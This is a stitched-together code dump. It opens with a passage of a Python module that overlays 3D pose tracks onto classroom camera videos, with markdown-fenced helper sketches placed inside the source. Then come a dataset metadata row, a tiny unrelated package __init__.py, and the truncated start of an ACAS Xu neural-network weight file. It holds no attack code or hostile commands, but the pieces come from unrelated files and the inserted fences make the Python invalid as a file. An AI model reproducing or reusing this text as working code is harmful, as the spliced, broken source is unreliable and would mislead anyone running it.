pose_processing_subdirectory='pose_processing',
chunk_size=100,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
local_video_directory='./videos',
video_filename_extension='mp4',
camera_calibrations=None,
keypoint_connectors=None,
pose_color='green',
keypoint_radius=3,
keypoint_alpha=0.6,
keypoint_connector_alpha=0.6,
keypoint_connector_linewidth=3,
pose_label_color='white',
pose_label_background_alpha=0.6,
pose_label_font_scale=1.5,
pose_label_line_width=1,
output_filename_datetime_format='%Y%m%d_%H%M%S_%f',
output_filename_extension='avi',
output_fourcc_string='XVID',
concatenate_videos=True,
delete_individual_clips=True,
parallel=False,
num_parallel_processes=None,
task_progress_bar=False,
segment_progress_bar=False,
notebook=False
):
"""
Fetches uninterpolated 3D pose track data from local files and overlays onto classroom videos.
Fetches and overlays onto all video clips that overlap with specified start
and end (e.g., if start is 10:32:56 and end is 10:33:20, returns videos
starting at 10:32:50, 10:33:00 and 10:33:10).
Script performs a logical AND across all camera specifications. If no camera
specifications are given, returns all active cameras in environment (as
determined by camera_device_types).
If keypoint connectors are not specified, script uses default keypoint
connectors for specified pose model.
Colors can be specified as any string interpretable by
matplotlib.colors.to_hex().
Input data is assumed to be organized as specified by output of
generate_pose_tracks_3d_local_by_time_segment().
Args:
start (datetime): Start of video overlay
end (datetime): End of video overlay
pose_tracking_3d_inference_id (str): Inference ID for source position data
base_dir (str): Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
pose_model_id (str): Honeycomb pose model ID for pose model that defines 2D/3D pose data structure
output_directory (str): Path to output directory (default is \'./video_overlays\')
output_filename_prefix (str): Filename prefix for output files (default is \'pose_tracks_3d_uninterpolated\')
camera_assignment_ids (sequence of str): List of Honeycomb assignment IDs for target cameras (default is None)
camera_device_types (sequence of str): List of Honeycomb device types for target cameras (default is video_io.DEFAULT_CAMERA_DEVICE_TYPES)
camera_device_ids (sequence of str): List of Honeycomb device IDs for target cameras (default is None)
camera_part_numbers (sequence of str): List of Honeycomb part numbers for target cameras (default is None)
camera_names (sequence of str): List of Honeycomb device names for target cameras (default is None)
camera_serial_numbers (sequence of str): List of Honeycomb device serial numbers for target cameras (default is None)
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
local_video_directory (str): Path to directory where local copies of Honeycomb videos are stored (default is \'./videos\')
video_filename_extension (str): Filename extension for local copies of Honeycomb videos (default is \'mp4\')
camera_calibrations (dict): Dict in format {DEVICE_ID: CAMERA_CALIBRATION_DATA} (default is None)
keypoint_connectors (array): Array of keypoints to connect with lines to form pose image (default is None)
pose_color (str): Color of pose (default is \'green\')
keypoint_radius (int): Radius of keypoints in pixels (default is 3)
keypoint_alpha (float): Alpha value for keypoints (default is 0.6)
keypoint_connector_alpha (float): Alpha value for keypoint connectors (default is 0.6)
keypoint_connector_linewidth (float): Line width for keypoint connectors (default is 3.0)
pose_label_color (str): Color for pose label text (default is 'white')
pose_label_background_alpha (float): Alpha value for pose label background (default is 0.6)
pose_label_font_scale (float): Font scale for pose label (default is 1.5)
pose_label_line_width (float): Line width for pose label text (default is 1.0)
output_filename_datetime_format (str): Datetime format for output filename (default is \'%Y%m%d_%H%M%S_%f\')
output_filename_extension (str): Filename extension for output (determines file format) (default is \'avi\')
output_fourcc_string (str): FOURCC code for output format (default is \'XVID\')
concatenate_videos (bool): Boolean indicating whether to concatenate videos for each camera into single videos (default is True)
delete_individual_clips (bool): Boolean indicating whether to delete individual clips after concatenating (default is True)
parallel (bool): Boolean indicating whether to use multiple parallel processes (one for each time segment) (default is False)
num_parallel_processes (int): Number of parallel processes in pool (otherwise defaults to number of cores - 1) (default is None)
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
segment_progress_bar (bool): Boolean indicating whether script should display a progress bar for each clip (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
"""
pose_tracks_3d_uninterpolated_df = process_pose_data.local_io.fetch_3d_poses_with_uninterpolated_tracks_local(
base_dir=base_dir,
environment_id=environment_id,
pose_tracking_3d_inference_id=pose_tracking_3d_inference_id,
start=start,
end=end,
pose_processing_subdirectory=pose_processing_subdirectory
)
pose_tracks_3d_uninterpolated_df = process_pose_data.local_io.add_short_track_labels(
pose_tracks_3d_uninterpolated_df
)
process_pose_data.overlay.overlay_poses(
poses_df=pose_tracks_3d_uninterpolated_df,
start=start,
end=end,
camera_assignment_ids=camera_assignment_ids,
environment_id=environment_id,
environment_name=None,
camera_device_types=camera_device_types,
camera_device_ids=camera_device_ids,
camera_part_numbers=camera_part_numbers,
camera_names=camera_names,
camera_serial_numbers=camera_serial_numbers,
chunk_size=chunk_size,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret,
local_video_directory=local_video_directory,
video_filename_extension=video_filename_extension,
pose_model_id=pose_model_id,
camera_calibrations=camera_calibrations,
pose_label_column='pose_track_3d_id_short',
keypoint_connectors=keypoint_connectors,
pose_color=pose_color,
keypoint_radius=keypoint_radius,
keypoint_alpha=keypoint_alpha,
keypoint_connector_alpha=keypoint_connector_alpha,
keypoint_connector_linewidth=keypoint_connector_linewidth,
pose_label_color=pose_label_color,
pose_label_background_alpha=pose_label_background_alpha,
pose_label_font_scale=pose_label_font_scale,
pose_label_line_width=pose_label_line_width,
output_directory=output_directory,
output_filename_prefix=output_filename_prefix,
output_filename_datetime_format=output_filename_datetime_format,
output_filename_extension=output_filename_extension,
output_fourcc_string=output_fourcc_string,
concatenate_videos=concatenate_videos,
delete_individual_clips=delete_individual_clips,
parallel=parallel,
num_parallel_processes=num_parallel_processes,
task_progress_bar=task_progress_bar,
segment_progress_bar=segment_progress_bar,
notebook=notebook
)
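# As the docstring above notes, overlays cover every video clip that overlaps
# the start/end window, with clips on fixed 10-second boundaries (the clip
# length is an assumption drawn from the docstring example; the helper name
# below is hypothetical, not part of this module). A minimal standalone sketch
# of that boundary logic:

```python
import datetime

CLIP_LENGTH_SECONDS = 10  # assumed from the docstring example (10:32:50, 10:33:00, ...)

def clip_start_times(start, end, clip_length=CLIP_LENGTH_SECONDS):
    """Return the start times of every clip overlapping [start, end)."""
    # Snap the window start down to the previous clip boundary
    first = start - datetime.timedelta(
        seconds=start.second % clip_length,
        microseconds=start.microsecond,
    )
    times = []
    t = first
    while t < end:
        times.append(t)
        t += datetime.timedelta(seconds=clip_length)
    return times

start = datetime.datetime(2021, 5, 1, 10, 32, 56)
end = datetime.datetime(2021, 5, 1, 10, 33, 20)
print([t.strftime('%H:%M:%S') for t in clip_start_times(start, end)])
# -> ['10:32:50', '10:33:00', '10:33:10']
```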
def overlay_pose_tracks_3d_interpolated_local(
start,
end,
pose_track_3d_interpolation_inference_id,
base_dir,
environment_id,
pose_model_id,
output_directory='./video_overlays',
output_filename_prefix='pose_tracks_3d_interpolated',
camera_assignment_ids=None,
camera_device_types=None,
camera_device_ids=None,
camera_part_numbers=None,
camera_names=None,
camera_serial_numbers=None,
pose_processing_subdirectory='pose_processing',
chunk_size=100,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
local_video_directory='./videos',
video_filename_extension='mp4',
camera_calibrations=None,
keypoint_connectors=None,
pose_color='green',
keypoint_radius=3,
keypoint_alpha=0.6,
keypoint_connector_alpha=0.6,
keypoint_connector_linewidth=3,
pose_label_color='white',
pose_label_background_alpha=0.6,
pose_label_font_scale=1.5,
pose_label_line_width=1,
output_filename_datetime_format='%Y%m%d_%H%M%S_%f',
output_filename_extension='avi',
output_fourcc_string='XVID',
concatenate_videos=True,
delete_individual_clips=True,
parallel=False,
num_parallel_processes=None,
task_progress_bar=False,
segment_progress_bar=False,
notebook=False
):
"""
Fetches interpolated 3D pose track data from local files and overlays onto classroom videos.
Fetches and overlays onto all video clips that overlap with specified start
and end (e.g., if start is 10:32:56 and end is 10:33:20, returns videos
starting at 10:32:50, 10:33:00 and 10:33:10).
Script performs a logical AND across all camera specifications. If no camera
specifications are given, returns all active cameras in environment (as
determined by camera_device_types).
If keypoint connectors are not specified, script uses default keypoint
connectors for specified pose model.
Colors can be specified as any string interpretable by
matplotlib.colors.to_hex().
Input data is assumed to be organized as specified by output of
interpolate_pose_tracks_3d_local_by_pose_track().
Args:
start (datetime): Start of video overlay
end (datetime): End of video overlay
pose_track_3d_interpolation_inference_id (str): Inference ID for source position data
base_dir (str): Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
pose_model_id (str): Honeycomb pose model ID for pose model that defines 2D/3D pose data structure
output_directory (str): Path to output directory (default is \'./video_overlays\')
output_filename_prefix (str): Filename prefix for output files (default is \'pose_tracks_3d_interpolated\')
camera_assignment_ids (sequence of str): List of Honeycomb assignment IDs for target cameras (default is None)
camera_device_types (sequence of str): List of Honeycomb device types for target cameras (default is video_io.DEFAULT_CAMERA_DEVICE_TYPES)
camera_device_ids (sequence of str): List of Honeycomb device IDs for target cameras (default is None)
camera_part_numbers (sequence of str): List of Honeycomb part numbers for target cameras (default is None)
camera_names (sequence of str): List of Honeycomb device names for target cameras (default is None)
camera_serial_numbers (sequence of str): List of Honeycomb device serial numbers for target cameras (default is None)
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
local_video_directory (str): Path to directory where local copies of Honeycomb videos are stored (default is \'./videos\')
video_filename_extension (str): Filename extension for local copies of Honeycomb videos (default is \'mp4\')
camera_calibrations (dict): Dict in format {DEVICE_ID: CAMERA_CALIBRATION_DATA} (default is None)
keypoint_connectors (array): Array of keypoints to connect with lines to form pose image (default is None)
pose_color (str): Color of pose (default is \'green\')
keypoint_radius (int): Radius of keypoints in pixels (default is 3)
keypoint_alpha (float): Alpha value for keypoints (default is 0.6)
keypoint_connector_alpha (float): Alpha value for keypoint connectors (default is 0.6)
keypoint_connector_linewidth (float): Line width for keypoint connectors (default is 3.0)
pose_label_color (str): Color for pose label text (default is 'white')
pose_label_background_alpha (float): Alpha value for pose label background (default is 0.6)
pose_label_font_scale (float): Font scale for pose label (default is 1.5)
pose_label_line_width (float): Line width for pose label text (default is 1.0)
output_filename_datetime_format (str): Datetime format for output filename (default is \'%Y%m%d_%H%M%S_%f\')
output_filename_extension (str): Filename extension for output (determines file format) (default is \'avi\')
output_fourcc_string (str): FOURCC code for output format (default is \'XVID\')
concatenate_videos (bool): Boolean indicating whether to concatenate videos for each camera into single videos (default is True)
delete_individual_clips (bool): Boolean indicating whether to delete individual clips after concatenating (default is True)
parallel (bool): Boolean indicating whether to use multiple parallel processes (one for each time segment) (default is False)
num_parallel_processes (int): Number of parallel processes in pool (otherwise defaults to number of cores - 1) (default is None)
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
segment_progress_bar (bool): Boolean indicating whether script should display a progress bar for each clip (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
"""
pose_tracks_3d_interpolated_df = process_pose_data.local_io.fetch_3d_poses_with_interpolated_tracks_local(
base_dir=base_dir,
environment_id=environment_id,
pose_track_3d_interpolation_inference_id=pose_track_3d_interpolation_inference_id,
start=start,
end=end,
pose_processing_subdirectory=pose_processing_subdirectory
)
pose_tracks_3d_interpolated_df = process_pose_data.local_io.add_short_track_labels(
pose_tracks_3d_interpolated_df
)
process_pose_data.overlay.overlay_poses(
poses_df=pose_tracks_3d_interpolated_df,
start=start,
end=end,
camera_assignment_ids=camera_assignment_ids,
environment_id=environment_id,
environment_name=None,
camera_device_types=camera_device_types,
camera_device_ids=camera_device_ids,
camera_part_numbers=camera_part_numbers,
camera_names=camera_names,
camera_serial_numbers=camera_serial_numbers,
chunk_size=chunk_size,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret,
local_video_directory=local_video_directory,
video_filename_extension=video_filename_extension,
pose_model_id=pose_model_id,
camera_calibrations=camera_calibrations,
pose_label_column='pose_track_3d_id_short',
keypoint_connectors=keypoint_connectors,
pose_color=pose_color,
keypoint_radius=keypoint_radius,
keypoint_alpha=keypoint_alpha,
keypoint_connector_alpha=keypoint_connector_alpha,
keypoint_connector_linewidth=keypoint_connector_linewidth,
pose_label_color=pose_label_color,
pose_label_background_alpha=pose_label_background_alpha,
pose_label_font_scale=pose_label_font_scale,
pose_label_line_width=pose_label_line_width,
output_directory=output_directory,
output_filename_prefix=output_filename_prefix,
output_filename_datetime_format=output_filename_datetime_format,
output_filename_extension=output_filename_extension,
output_fourcc_string=output_fourcc_string,
concatenate_videos=concatenate_videos,
delete_individual_clips=delete_individual_clips,
parallel=parallel,
num_parallel_processes=num_parallel_processes,
task_progress_bar=task_progress_bar,
segment_progress_bar=segment_progress_bar,
notebook=notebook
)
def overlay_pose_tracks_3d_identified_interpolated_local(
start,
end,
pose_track_3d_identification_inference_id,
base_dir,
environment_id,
pose_model_id,
output_directory='./video_overlays',
output_filename_prefix='pose_tracks_3d_identified_interpolated',
camera_assignment_ids=None,
camera_device_types=None,
camera_device_ids=None,
camera_part_numbers=None,
camera_names=None,
camera_serial_numbers=None,
pose_track_label_column='short_name',
pose_processing_subdirectory='pose_processing',
chunk_size=100,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
local_video_directory='./videos',
video_filename_extension='mp4',
camera_calibrations=None,
keypoint_connectors=None,
pose_color='green',
keypoint_radius=3,
keypoint_alpha=0.6,
keypoint_connector_alpha=0.6,
keypoint_connector_linewidth=3,
pose_label_color='white',
pose_label_background_alpha=0.6,
pose_label_font_scale=1.5,
pose_label_line_width=1,
output_filename_datetime_format='%Y%m%d_%H%M%S_%f',
output_filename_extension='avi',
output_fourcc_string='XVID',
concatenate_videos=True,
delete_individual_clips=True,
parallel=False,
num_parallel_processes=None,
task_progress_bar=False,
segment_progress_bar=False,
notebook=False
):
"""
Fetches identified, interpolated 3D pose track data from local files and overlays onto classroom videos.
Fetches and overlays onto all video clips that overlap with specified start
and end (e.g., if start is 10:32:56 and end is 10:33:20, returns videos
starting at 10:32:50, 10:33:00 and 10:33:10).
Script performs a logical AND across all camera specifications. If no camera
specifications are given, returns all active cameras in environment (as
determined by camera_device_types).
If keypoint connectors are not specified, script uses default keypoint
connectors for specified pose model.
Colors can be specified as any string interpretable by
matplotlib.colors.to_hex().
Input data is assumed to be organized as specified by output of
identify_pose_tracks_3d_local_by_segment().
Args:
start (datetime): Start of video overlay
end (datetime): End of video overlay
pose_track_3d_identification_inference_id (str): Inference ID for source position data
base_dir (str): Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
pose_model_id (str): Honeycomb pose model ID for pose model that defines 2D/3D pose data structure
output_directory (str): Path to output directory (default is \'./video_overlays\')
output_filename_prefix (str): Filename prefix for output files (default is \'pose_tracks_3d_identified_interpolated\')
camera_assignment_ids (sequence of str): List of Honeycomb assignment IDs for target cameras (default is None)
camera_device_types (sequence of str): List of Honeycomb device types for target cameras (default is video_io.DEFAULT_CAMERA_DEVICE_TYPES)
camera_device_ids (sequence of str): List of Honeycomb device IDs for target cameras (default is None)
camera_part_numbers (sequence of str): List of Honeycomb part numbers for target cameras (default is None)
camera_names (sequence of str): List of Honeycomb device names for target cameras (default is None)
camera_serial_numbers (sequence of str): List of Honeycomb device serial numbers for target cameras (default is None)
pose_track_label_column (str): Name of person data column to use for pose labels (default is \'short_name\')
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
local_video_directory (str): Path to directory where local copies of Honeycomb videos are stored (default is \'./videos\')
video_filename_extension (str): Filename extension for local copies of Honeycomb videos (default is \'mp4\')
camera_calibrations (dict): Dict in format {DEVICE_ID: CAMERA_CALIBRATION_DATA} (default is None)
keypoint_connectors (array): Array of keypoints to connect with lines to form pose image (default is None)
pose_color (str): Color of pose (default is \'green\')
keypoint_radius (int): Radius of keypoints in pixels (default is 3)
keypoint_alpha (float): Alpha value for keypoints (default is 0.6)
keypoint_connector_alpha (float): Alpha value for keypoint connectors (default is 0.6)
keypoint_connector_linewidth (float): Line width for keypoint connectors (default is 3.0)
pose_label_color (str): Color for pose label text (default is 'white')
pose_label_background_alpha (float): Alpha value for pose label background (default is 0.6)
pose_label_font_scale (float): Font scale for pose label (default is 1.5)
pose_label_line_width (float): Line width for pose label text (default is 1.0)
output_filename_datetime_format (str): Datetime format for output filename (default is \'%Y%m%d_%H%M%S_%f\')
output_filename_extension (str): Filename extension for output (determines file format) (default is \'avi\')
output_fourcc_string (str): FOURCC code for output format (default is \'XVID\')
concatenate_videos (bool): Boolean indicating whether to concatenate videos for each camera into single videos (default is True)
delete_individual_clips (bool): Boolean indicating whether to delete individual clips after concatenating (default is True)
parallel (bool): Boolean indicating whether to use multiple parallel processes (one for each time segment) (default is False)
num_parallel_processes (int): Number of parallel processes in pool (otherwise defaults to number of cores - 1) (default is None)
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
segment_progress_bar (bool): Boolean indicating whether script should display a progress bar for each clip (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
"""
pose_tracks_3d_identified_interpolated_df = process_pose_data.local_io.fetch_3d_poses_with_person_info(
base_dir=base_dir,
environment_id=environment_id,
pose_track_3d_identification_inference_id=pose_track_3d_identification_inference_id,
start=start,
end=end,
pose_processing_subdirectory=pose_processing_subdirectory,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
process_pose_data.overlay.overlay_poses(
poses_df=pose_tracks_3d_identified_interpolated_df,
start=start,
end=end,
camera_assignment_ids=camera_assignment_ids,
environment_id=environment_id,
environment_name=None,
camera_device_types=camera_device_types,
camera_device_ids=camera_device_ids,
camera_part_numbers=camera_part_numbers,
camera_names=camera_names,
camera_serial_numbers=camera_serial_numbers,
chunk_size=chunk_size,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret,
local_video_directory=local_video_directory,
video_filename_extension=video_filename_extension,
pose_model_id=pose_model_id,
camera_calibrations=camera_calibrations,
pose_label_column=pose_track_label_column,
keypoint_connectors=keypoint_connectors,
pose_color=pose_color,
keypoint_radius=keypoint_radius,
keypoint_alpha=keypoint_alpha,
keypoint_connector_alpha=keypoint_connector_alpha,
keypoint_connector_linewidth=keypoint_connector_linewidth,
pose_label_color=pose_label_color,
pose_label_background_alpha=pose_label_background_alpha,
pose_label_font_scale=pose_label_font_scale,
pose_label_line_width=pose_label_line_width,
output_directory=output_directory,
output_filename_prefix=output_filename_prefix,
output_filename_datetime_format=output_filename_datetime_format,
output_filename_extension=output_filename_extension,
output_fourcc_string=output_fourcc_string,
concatenate_videos=concatenate_videos,
delete_individual_clips=delete_individual_clips,
parallel=parallel,
num_parallel_processes=num_parallel_processes,
task_progress_bar=task_progress_bar,
segment_progress_bar=segment_progress_bar,
notebook=notebook
)
def generate_metadata(
environment_id,
pipeline_stage,
parameters
):
metadata = {
'inference_id': uuid4().hex,
'inference_execution_start': datetime.datetime.now(tz=datetime.timezone.utc),
'inference_execution_name': pipeline_stage,
'inference_execution_model': 'wf-process-pose-data',
'inference_execution_version': process_pose_data.__version__,
'parameters': parameters
}
return metadata
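# generate_metadata() stamps each pipeline stage with a fresh inference ID and
# a timezone-aware UTC timestamp. A self-contained sketch of the same pattern
# (standalone, so it does not import process_pose_data; the version string and
# stage name below are placeholders, not real values):

```python
import datetime
from uuid import uuid4

def make_inference_metadata(pipeline_stage, parameters, model_version='0.0.0'):
    # Mirrors generate_metadata(): unique hex ID plus UTC execution timestamp
    return {
        'inference_id': uuid4().hex,
        'inference_execution_start': datetime.datetime.now(tz=datetime.timezone.utc),
        'inference_execution_name': pipeline_stage,
        'inference_execution_model': 'wf-process-pose-data',
        'inference_execution_version': model_version,
        'parameters': parameters,
    }

metadata = make_inference_metadata('pose_reconstruction_3d', {'min_keypoint_quality': 0.3})
print(sorted(metadata.keys()))
```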
def extract_coordinate_space_id_from_camera_calibrations(camera_calibrations):
coordinate_space_ids = set([camera_calibration.get('space_id') for camera_calibration in camera_calibrations.values()])
if len(coordinate_space_ids) > 1:
raise ValueError('Multiple coordinate space IDs found in camera calibration data')
coordinate_space_id = list(coordinate_space_ids)[0]
return coordinate_space_id
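# extract_coordinate_space_id_from_camera_calibrations() only succeeds when
# every calibration shares one space ID. A standalone copy of that logic for
# illustration (the device and space IDs below are made up):

```python
def extract_space_id(camera_calibrations):
    # Standalone copy of the logic above: collect distinct space IDs,
    # reject mixed-space calibration sets
    space_ids = set(
        calibration.get('space_id')
        for calibration in camera_calibrations.values()
    )
    if len(space_ids) > 1:
        raise ValueError('Multiple coordinate space IDs found in camera calibration data')
    return space_ids.pop()

calibrations = {  # hypothetical device and space IDs
    'camera-a': {'space_id': 'space-1'},
    'camera-b': {'space_id': 'space-1'},
}
print(extract_space_id(calibrations))  # -> space-1
```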
def generate_pose_3d_limits(
pose_model_id,
room_x_limits,
room_y_limits,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None
):
pose_model = honeycomb_io.fetch_pose_model_by_pose_model_id(
pose_model_id,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
pose_model_name = pose_model.get('model_name')
pose_3d_limits = poseconnect.reconstruct.pose_3d_limits_by_pose_model(
room_x_limits=room_x_limits,
room_y_limits=room_y_limits,
pose_model_name=pose_model_name
)
return pose_3d_limits
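# generate_pose_3d_limits() delegates to
# poseconnect.reconstruct.pose_3d_limits_by_pose_model(), which derives
# per-keypoint 3D bounding limits from the room footprint. A greatly
# simplified standalone sketch of the idea (the uniform height range is a
# made-up assumption; poseconnect's real limits depend on the pose model and
# vary per keypoint):

```python
def simple_pose_3d_limits(room_x_limits, room_y_limits, num_keypoints, z_limits=(0.0, 2.5)):
    # Simplified stand-in: every keypoint constrained to the room footprint
    # and one assumed height range
    lower = [[room_x_limits[0], room_y_limits[0], z_limits[0]] for _ in range(num_keypoints)]
    upper = [[room_x_limits[1], room_y_limits[1], z_limits[1]] for _ in range(num_keypoints)]
    return lower, upper

# Hypothetical 8 m x 6 m room, 17-keypoint pose model
lower, upper = simple_pose_3d_limits([0.0, 8.0], [0.0, 6.0], num_keypoints=17)
print(len(lower), lower[0], upper[0])
```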
bad22ffd596534fb2cacc36c2735e28d42ddc44d | 110 | py | Python | shrubbery/shrubbery/__init__.py | jkleckner/cython_example | 4a0d66130cb713f7a2eff12185a0260df34850c5 | [
"Apache-2.0"
] | 9 | 2018-04-21T15:08:29.000Z | 2021-11-27T07:39:17.000Z | shrubbery/shrubbery/__init__.py | jkleckner/cython_example | 4a0d66130cb713f7a2eff12185a0260df34850c5 | [
"Apache-2.0"
] | null | null | null | shrubbery/shrubbery/__init__.py | jkleckner/cython_example | 4a0d66130cb713f7a2eff12185a0260df34850c5 | [
"Apache-2.0"
] | null | null | null | #from .shrubbing import standard_shrubbery, get_width, get_length
from .shrubbing import standard_shrubbery
| 22 | 65 | 0.845455 | 14 | 110 | 6.357143 | 0.571429 | 0.292135 | 0.426966 | 0.606742 | 0.808989 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109091 | 110 | 4 | 66 | 27.5 | 0.908163 | 0.581818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
2418097805986539e956b61d0f302dbe6bee5583 | 385,211 | pyt | Python | eran/NNet/nnet/ACASXU_run2a_2_3_batch_2000_16bit.pyt | pauls658/ReluDiff-ICSE2020-Artifact | 212854fe04f482183c239e5dfec70106a9a83df8 | [
"Apache-2.0"
] | 7 | 2020-01-27T21:25:49.000Z | 2022-01-07T04:37:37.000Z | eran/NNet/nnet/ACASXU_run2a_2_3_batch_2000_16bit.pyt | yqtianust/ReluDiff-ICSE2020-Artifact | 149f6efe4799602db749faa576980c36921a07c7 | [
"Apache-2.0"
] | 1 | 2022-01-25T17:41:54.000Z | 2022-01-26T02:27:51.000Z | eran/NNet/nnet/ACASXU_run2a_2_3_batch_2000_16bit.pyt | yqtianust/ReluDiff-ICSE2020-Artifact | 149f6efe4799602db749faa576980c36921a07c7 | [
"Apache-2.0"
] | 3 | 2020-03-14T17:12:17.000Z | 2022-03-16T09:50:46.000Z | ReLU
[[-0.0205536, 0.247547, -0.22162, -1.46965, -0.521872], [0.710832, 0.0446766, 0.210378, 0.0632681, -0.136324], [-0.0282998, 0.00491106, 1.68893, 0.0656829, -0.0454055], [0.0869821, 0.00150222, 0.0158949, -0.635404, -1.42556], [-0.0753982, 0.173193, -0.383985, -0.319155, 0.0246028], [0.0619609, -1.52835, 0.00669813, 0.0446679, -0.0895697], [0.0588217, -0.132968, 0.161161, -0.0640877, -1.27436], [-0.00566708, -0.0994157, -0.035463, -1.09963, 0.613878], [-0.461944, -0.0978144, 0.113282, -0.428043, 0.213594], [0.0509299, 1.24149, -1.22924, -0.0690498, 0.495966], [-0.00615383, 0.00481973, 1.17321, 0.0610198, -0.0479329], [-0.184854, 1.2465, 1.66498, 0.672174, -0.304357], [-1.58675, 0.0386128, -0.046232, -0.243469, 0.175518], [0.049292, 0.725318, 0.135358, -0.844547, -0.0424992], [0.056024, -0.109216, -0.00853776, -0.561847, -1.46146], [-0.00381822, -0.245589, 0.375144, -0.213999, -1.62968], [-0.0271461, 1.09685, 0.691986, 0.00494144, -0.0365058], [0.0501371, 0.0102551, -0.00609986, -1.25271, -0.714875], [-0.00096623, -0.0579098, 0.111794, 0.63606, -0.967184], [0.205268, 0.100215, -0.116159, -0.531469, -1.16496], [-0.00140001, -0.117962, 0.0986712, -1.42939, -0.596443], [-1.20489, 0.00499474, 0.00224722, -0.0788109, -0.531097], [0.0341653, -0.75784, -1.16271, 0.138826, -0.108376], [-2.00863, -0.183904, -0.0266509, 0.102098, 0.152136], [-0.0176994, -1.64635, 1.87141, -0.045419, 0.335076], [0.139941, -1.85992, 0.400993, -0.156754, -0.739956], [0.115651, 0.0259321, -0.249902, 0.321394, -0.961429], [-0.00640331, 0.0338228, 0.020067, -0.746619, -1.01117], [-0.0205555, 0.0238262, -0.00710481, 0.00993486, -0.00195851], [-0.774547, -0.0511929, -0.0952544, -0.107889, -0.0713629], [0.00214213, -0.0107202, -0.0193541, -1.04431, -1.19396], [-1.17989, 0.0129286, 0.00463964, -0.425268, -0.289161], [-0.0214634, 0.00214001, -0.0190182, -0.0456416, 1.1099], [-0.029243, -1.56354, 1.30367, 0.0297061, -0.320085], [0.0197814, 0.201381, 0.605706, -0.468032, 0.497662], [-0.506525, -0.62106, 
0.626484, 0.275208, -0.431391], [0.0531451, -0.186863, -0.126187, -0.313901, -0.104601], [-0.0630314, -0.076252, 0.330454, -0.0740661, -1.5834], [-0.733682, 0.0412771, -0.446468, -0.00970908, 0.331554], [-1.46362, -0.0669328, 0.746043, 0.140668, 0.0382584], [-0.14939, 1.03969, -1.33554, 0.273186, -0.498295], [-0.304713, -0.0379349, -0.164071, -1.19174, 0.079117], [-1.71237, 0.0157772, 0.0198623, 0.146487, -0.267808], [0.0259492, -1.18695, -0.0298402, 0.165567, -0.159584], [-0.021579, 0.341542, 0.452558, -0.231205, 0.0440514], [-1.9631, 0.154049, 0.0137692, 0.0817737, -0.125252], [-0.0219194, -0.00243167, 0.00803058, 0.0047772, 0.0064134], [-0.0501559, 0.276345, -0.381865, -0.501957, -1.4581], [0.298677, 2.1332, -0.6261, 0.185432, -0.248539], [-1.38707, -0.00757278, -0.132848, -0.114998, -0.0878607], [-0.02055, 0.2476, -0.2217, -1.47, -0.522], [0.711, 0.04468, 0.2103, 0.0633, -0.1364], [-0.0283, 0.00491, 1.688, 0.0657, -0.0454], [0.087, 0.001502, 0.0159, -0.6353, -1.426], [-0.0754, 0.1732, -0.384, -0.319, 0.0246], [0.06195, -1.528, 0.0067, 0.04468, -0.0896], [0.0588, -0.1329, 0.1611, -0.0641, -1.274], [-0.00567, -0.0994, -0.03546, -1.1, 0.614], [-0.462, -0.09784, 0.1133, -0.428, 0.2136], [0.05093, 1.241, -1.2295, -0.06903, 0.4958], [-0.006153, 0.004818, 1.173, 0.061, -0.04794], [-0.1848, 1.246, 1.665, 0.6724, -0.3044], [-1.587, 0.0386, -0.04623, -0.2434, 0.1755], [0.0493, 0.725, 0.1354, -0.8447, -0.0425], [0.05603, -0.1092, -0.00854, -0.562, -1.462], [-0.003819, -0.2456, 0.3752, -0.214, -1.63], [-0.02715, 1.097, 0.692, 0.00494, -0.0365], [0.05014, 0.010254, -0.0061, -1.253, -0.715], [-0.000966, -0.05792, 0.1118, 0.636, -0.9673], [0.2053, 0.1002, -0.11615, -0.5312, -1.165], [-0.0014, -0.118, 0.0987, -1.43, -0.5967], [-1.205, 0.004993, 0.002247, -0.0788, -0.5312], [0.03418, -0.758, -1.163, 0.1388, -0.1084], [-2.008, -0.184, -0.02666, 0.1021, 0.1521], [-0.0177, -1.646, 1.871, -0.0454, 0.335], [0.1399, -1.86, 0.401, -0.1567, -0.7397], [0.11566, 0.02592, -0.2499, 0.3213, 
